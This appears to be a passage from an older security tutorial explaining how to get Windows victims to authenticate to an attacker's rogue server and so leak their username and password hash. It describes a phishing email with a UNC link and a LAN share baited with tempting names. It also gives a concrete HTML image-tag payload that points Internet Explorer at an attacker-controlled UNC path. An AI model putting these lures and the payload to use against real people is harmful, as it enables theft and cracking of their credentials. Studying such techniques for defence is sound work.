How to get the victim to log into the rogue server?

The big question to answer is how one can get the victim to log into the rogue server, thus exposing his username and password hash for the attacker to break.

Approach #1: Sending a html mail that includes a link in the form of a UNC path should do the trick, depending primarily on the sender's rhetoric ability in getting his victim to click the link, and the mail client to understand what it's expected to do. A UNC path is usually in the form of \\192.168.7.6\share, where the IP address obviously specifies the host to connect to, and ``share'' is a shared resource on that host. Due to Microsoft always being concerned about comfort first, the following will happen once the victim clicks the link on a Windows machine. The OS will try to log into the specified resource. When asked for a username and password, the client happily provides the current user's username and his hashed password to the server in an effort to try to log in with these credentials. No user interaction required. No joke.

Approach #2: Getting the victim to visit a site that includes a UNC path with Internet Explorer has the same result.
An image tag like <img src="\\\\192.168.7.6\ble.jpg"> will do the trick. IE will make Windows try to log into the resource in order to get the image. Again, no user interaction is required. This trick does not work with Mozilla Firefox by the way.

Approach #3: If the rogue server is part of the LAN, advertising it in the network neighbourhood as "warez, porn, mp3, movie" - server should result in users trying to log into it sooner or later. There's no way anyone can withstand the power of the 4 elements!

There's plenty of other ways that the author leaves to the readers imagination.